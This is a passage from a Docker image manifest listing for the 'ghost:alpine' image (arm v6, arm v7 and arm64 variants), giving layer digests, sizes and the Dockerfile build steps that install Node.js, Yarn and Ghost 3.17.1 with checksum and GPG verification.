- `sha256:9047e99c8937584e2f6b1ab3841c7eb0c0dbdbe720b44c541f49d2bce3976aba`
Last Modified: Tue, 26 May 2020 23:11:39 GMT
Size: 9.9 KB (9904 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d459bac936303ed7b3e824328df49eac57898ae1ccd036eca9950e0959ed671a`
Last Modified: Tue, 26 May 2020 23:11:39 GMT
Size: 780.5 KB (780510 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:16a5d271dfde67d858beff79b47ba871470e9ff7ee15a9dcc3b0ac38d72362f6`
Last Modified: Tue, 26 May 2020 23:11:42 GMT
Size: 7.0 MB (7011442 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c458630d7f8ab505a0d13dc5ffb4aef556fa9fae25f602b21772af1ce9e0e1a3`
Last Modified: Tue, 26 May 2020 23:11:55 GMT
Size: 71.4 MB (71427412 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a71cb63cc937a976db35f155a25a452bfefc058d123d8d1a80050221d266fddd`
Last Modified: Tue, 26 May 2020 23:11:39 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; arm variant v6
```console
$ docker pull ghost@sha256:6b16f2c13b2b3234d18f913b5a5861cef784023a10838f6407e43ffa19c919e9
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **92.4 MB (92356900 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:17f63fdb9e542a0ebdda5de930e750db7d1e4565734fe4891b51bcabe0f1c554`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 15:51:24 GMT
ADD file:cc0770cddff6b50d5e31f39886420eb8a0b4af55664d6f7599207c9aeaf6a501 in /
# Thu, 23 Apr 2020 15:51:25 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 22:58:14 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 23:09:11 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 23:09:12 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 23:09:19 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 23:09:19 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 23:09:20 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:09:20 GMT
CMD ["node"]
# Tue, 26 May 2020 23:37:40 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Tue, 26 May 2020 23:37:42 GMT
RUN apk add --no-cache bash
# Tue, 26 May 2020 23:37:43 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 23:37:43 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 23:38:23 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 23:38:26 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 23:38:27 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 23:38:27 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 23:45:42 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 23:45:46 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 23:45:47 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 23:45:47 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 23:45:48 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:45:48 GMT
EXPOSE 2368
# Tue, 26 May 2020 23:45:49 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:b9e3228833e92f0688e0f87234e75965e62e47cfbb9ca8cc5fa19c2e7cd13f80`
Last Modified: Thu, 23 Apr 2020 15:52:05 GMT
Size: 2.6 MB (2619936 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:994277a788b748b466efc6badd343f22afd5bb19078b2eff8e9b2a9a0c6dcab8`
Last Modified: Tue, 26 May 2020 23:10:59 GMT
Size: 24.1 MB (24146731 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8e3e71dbb316526675386b5fb23da51e7a1a674243c50e36c3aa4c2df457f1a2`
Last Modified: Tue, 26 May 2020 23:10:52 GMT
Size: 2.3 MB (2294520 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e3898eddc9e8d8197b99a99661bc451815ac200b298457d445e104da82c6bd8d`
Last Modified: Tue, 26 May 2020 23:10:51 GMT
Size: 282.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f47af75179fbb26b9a7dfe183252e3cc45d5b7ae8fcd8b44a23da5d524976e88`
Last Modified: Tue, 26 May 2020 23:46:24 GMT
Size: 9.7 KB (9729 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:25fd339156a8af00dcd7f9447ca383232f6a64ec5c243179204356b7a8d48579`
Last Modified: Tue, 26 May 2020 23:46:24 GMT
Size: 733.4 KB (733444 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9e5ffb0ed0a1b428aa62eb6fe9ee16c4ee6d772e57efd7e9d8248b05dd6c0343`
Last Modified: Tue, 26 May 2020 23:46:28 GMT
Size: 7.0 MB (7011515 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b7fcb9ae702c2de865bcb51e53b3dbca41fdd02be514ae9e4dfcd7d6356d07c5`
Last Modified: Tue, 26 May 2020 23:46:54 GMT
Size: 55.5 MB (55540200 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d65fd596ff685c7aacdb2833b28fb428253776da08922a2b826ea96ef3470e43`
Last Modified: Tue, 26 May 2020 23:46:24 GMT
Size: 543.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; arm variant v7
```console
$ docker pull ghost@sha256:188b1ee1974fec8802f1f98ad3abdf26ec6dc37c228271ddcad660da9e31d376
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **91.2 MB (91171084 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:a3d6e2e4db9d805f27fce6036a9491e9db7148656823b9408b348a9ced576c3c`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 22:04:19 GMT
ADD file:33578d3cacfab86c195d99396dd012ec511796a1d2d8d6f0a02b8a055673c294 in /
# Thu, 23 Apr 2020 22:04:22 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 23:21:14 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 23:31:23 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 23:31:26 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 23:31:39 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 23:31:41 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 23:31:43 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:31:45 GMT
CMD ["node"]
# Wed, 27 May 2020 00:03:15 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Wed, 27 May 2020 00:03:17 GMT
RUN apk add --no-cache bash
# Wed, 27 May 2020 00:03:18 GMT
ENV NODE_ENV=production
# Wed, 27 May 2020 00:03:19 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Wed, 27 May 2020 00:03:43 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Wed, 27 May 2020 00:03:45 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Wed, 27 May 2020 00:03:45 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Wed, 27 May 2020 00:03:46 GMT
ENV GHOST_VERSION=3.17.1
# Wed, 27 May 2020 00:08:11 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Wed, 27 May 2020 00:08:14 GMT
WORKDIR /var/lib/ghost
# Wed, 27 May 2020 00:08:14 GMT
VOLUME [/var/lib/ghost/content]
# Wed, 27 May 2020 00:08:15 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Wed, 27 May 2020 00:08:16 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Wed, 27 May 2020 00:08:16 GMT
EXPOSE 2368
# Wed, 27 May 2020 00:08:17 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:3cfb62949d9d8613854db4d5fe502a9219c2b55a153043500078a64e880ae234`
Last Modified: Thu, 23 Apr 2020 22:05:12 GMT
Size: 2.4 MB (2422063 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2363ebe8a93a363d6975fde20fcd45db8aea1c29b1c271c5f4d168d00890a98c`
Last Modified: Tue, 26 May 2020 23:38:00 GMT
Size: 23.7 MB (23707825 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3a891d27e71f361ccde7e63cd9e54867107fa935d174b447e7deb9efd8061fbc`
Last Modified: Tue, 26 May 2020 23:37:05 GMT
Size: 2.3 MB (2294549 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:eaed1f5294ca3759c414233ddf7857e828077797d8c6125c8bd9810584d133a7`
Last Modified: Tue, 26 May 2020 23:37:04 GMT
Size: 282.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:542efbfdd740f52f0b4127afa5f9c0d26002c8a03bd7fffb603f2b6c00fde3e5`
Last Modified: Wed, 27 May 2020 00:09:40 GMT
Size: 9.5 KB (9514 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0e78a0b2026eb2f843a4ef70ee919410cbdb0405be083fb1496eeba21985e42f`
Last Modified: Wed, 27 May 2020 00:09:40 GMT
Size: 669.0 KB (669031 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:971bd4d4b080d98cb7d96b705d83c82686a039f055919b860de732815237911c`
Last Modified: Wed, 27 May 2020 00:09:45 GMT
Size: 7.0 MB (7011445 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c9d1db669ca37615d0214724461d6b7cd5cfc82386641c1790bd26e43e4b04c7`
Last Modified: Wed, 27 May 2020 00:10:05 GMT
Size: 55.1 MB (55055832 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:cbf2d43ebe0a452facaedba8d5709e62a48ae3039e8da623310f10223800a35b`
Last Modified: Wed, 27 May 2020 00:09:40 GMT
Size: 543.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; arm64 variant v8
```console
$ docker pull ghost@sha256:c071a3282f975fdb2d7ab2bff38d66ffa04e12e80b9bafec711d0b1229762975
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **93.4 MB (93401270 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:cde00db8e0e2f3dc89cef477eeb98733fc8787783db27c0d18634ff78c1c4a3c`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Fri, 24 Apr 2020 00:14:18 GMT
ADD file:85ae77bc1e43353ff14e6fe1658be1ed4ecbf4330212ac3d7ab7462add32dd39 in /
# Fri, 24 Apr 2020 00:14:21 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 22:31:07 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 22:42:13 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 22:42:16 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 22:42:27 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 22:42:28 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 22:42:31 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 22:42:32 GMT
CMD ["node"]
# Tue, 26 May 2020 23:04:43 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Tue, 26 May 2020 23:04:48 GMT
RUN apk add --no-cache bash
# Tue, 26 May 2020 23:04:49 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 23:04:50 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 23:05:21 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 23:05:23 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 23:05:24 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 23:05:26 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 23:10:47 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 23:10:53 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 23:10:53 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 23:10:54 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 23:10:55 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:10:55 GMT
EXPOSE 2368
# Tue, 26 May 2020 23:10:56 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:29e5d40040c18c692ed73df24511071725b74956ca1a61fe6056a651d86a13bd`
Last Modified: Fri, 24 Apr 2020 00:15:41 GMT
Size: 2.7 MB (2724424 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:7a0645aba79184b4b2f8746b951cd4f319eaad9894739aa71726e80e7454bd7a`
Last Modified: Tue, 26 May 2020 22:49:44 GMT
Size: 24.9 MB (24864671 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:aaf79fc3473c4e5879fc6ec74fda103961b7e6a2c89dd7e21c06085e40ee2559`
Last Modified: Tue, 26 May 2020 22:49:35 GMT
Size: 2.3 MB (2302081 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8f7828b9f2b027f87ec1ac524c0a524c3376af9bc9d471ac9a00a5cab4281efb`
Last Modified: Tue, 26 May 2020 22:49:35 GMT
Size: 283.0 B
